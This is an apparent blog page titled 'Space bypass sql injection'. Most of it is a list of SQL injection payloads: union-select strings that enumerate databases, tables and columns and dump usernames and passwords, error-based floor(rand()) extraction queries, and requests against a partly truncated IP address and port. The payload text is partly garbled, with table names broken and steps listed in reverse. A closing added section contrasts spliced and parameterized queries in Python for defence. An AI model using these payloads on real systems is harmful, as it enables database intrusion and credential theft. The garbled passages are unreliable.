healthcarehaa.blogg.se

Space bypass sql injection







The back-end query has the form Select * from table where id = $id, followed by possible restriction clauses, nested queries and so on. So I have a habit of ending the injected statement with a comment character to block this possible interference.


We already looked at this page in the previous section. This time we start reasoning directly, still guessing the SQL:

(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20-%20- (Explode the name of the table to perform hashcode)

?id=0‘ union select 1,2,group_concat(username,0x3a,password) from users-+ (Explode the field name of the target column)

?id = 0 " union select 1,2,group_concat(column_name) from information_lumns where table_name= "users " -+ (Explode the column name of the target table)

?id =- 1’ union select 1, 2,group_concat(table_name) from information_schema.tables where table_schema = database() - (Explode all tables of the current database)

?id =- 1’ union select 1, 2, database() - (The current database name is displayed back on the page)

?id = 1’ order by n - (order by tests the field length; an error means that the maximum length is exceeded)

?id = 1’ - (Commenting out the extra ’ limit 0,1; the page is normal)

?id = 1 ’ (Test for the presence of injection; the error is reported in the)


Take the book search page as an example: post a name =1 to the back end, where it is spliced into the SQL statement select * from books where bookid =‘$id’limit 0, 1

?id=2 " and ( select 1 from ( select count( *),concat((( select concat(password, " ") from users limit 0, 1)), floor ( rand( 0) * 2))x from information_schema.tables group by x)a).

?id = 2 " and (select 1 from (select count(*),concat(((select concat(column_name, " " ) from information_lumns where table_name= "users " limit 5,1)),floor (rand(0)*2))x from information_schema.tables group by x)a).

?id=2 " and ( select 1 from ( select count( *),concat((( select concat(table_name, " ") from information_schema.tables where table_schema = " security " limit 0, 1)), floor ( rand( 0) * 2))x from information_schema.tables group by x)a).

?id = 2 " and (select 1 from (select count(*),concat(((select concat(database(), " " ))),floor (rand(0)*2))x from information_schema.tables group by x)a).

" and ( select 1 from ( select count( *),concat((( select concat(schema_name, " ") from information_schema.schemata limit 0, 1)), floor ( rand( 0) * 2))x from information_schema.tables group by x)a).

?id = 1 " and (select 1 from (select count(*),concat(((select (schema_name) from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a).

49.228: 48120 /new_list.php?id =- 1 union select 1,group_concat(name, 0x3a,password), 3, 4 from StormGroup_member - (Injects out the field value)

49.228: 48120 /new_list.php?id =- 1 union select 1,group_concat(column_name), 3, 4 from information_lumns where table_name ="StormGroup_member" - (Injects out the column name)


49.228: 48120 /new_list.php?id =- 1 union select 1,group_concat(table_name), 3, 4 from information_schema.tables where table_schema = database() - (Injects out the table names)

Let the id query return no result, so that the page shows the values of our union select. The number of values after union select follows the value determined with order by.


49.228: 48120 /new_list.php?id = 1 " order by 4- (Determine the number of fields)

If it is id=1 " and 1 = 1 - then and 1=1 is the point we can control. The next substitutions go in this position.
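
For the books query quoted above and the trailing comment character described at the top of the page, here is an added example (not from the original post) that puts the spliced statement next to a bound parameter. It assumes Python's sqlite3 with a constructed in-memory table as a stand-in for the page's back end; all function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names follow the page's books query.
    db = sqlite3.connect(":memory:")
    db.execute("create table books (bookid text, title text)")
    db.executemany("insert into books values (?, ?)",
                   [("1", "Alpha"), ("2", "Beta"), ("3", "Gamma")])
    return db

def search_spliced(db, book_id):
    # Vulnerable form: the value is pasted into the SQL text, so a quote in
    # book_id closes the string literal and the rest is parsed as SQL.
    sql = "select title from books where bookid = '%s' limit 0, 1" % book_id
    return [row[0] for row in db.execute(sql)]

def search_bound(db, book_id):
    # Hardened form: the SQL text is fixed and the value is sent as a bound
    # parameter, so it is only ever compared as data.
    sql = "select title from books where bookid = ? limit 0, 1"
    return [row[0] for row in db.execute(sql, (book_id,))]

def spliced_raises(db, book_id):
    # A database error caused by a lone quote is the signal that input
    # reaches the SQL parser; worth alerting on in application logs.
    try:
        search_spliced(db, book_id)
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    db = make_db()
    # Inputs taken from the page: a bare quote, and a quote plus a comment.
    for value in ["1", "1'", "1' -- ", "1' and 1 = 1 -- "]:
        if spliced_raises(db, value):
            spliced = "SQL error"
        else:
            spliced = search_spliced(db, value)
        print(repr(value), "spliced:", spliced, "bound:", search_bound(db, value))
```

With the spliced query, the comment removes the rest of the statement and the input is treated as id 1; with the bound query the same input is just a string that matches no row.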








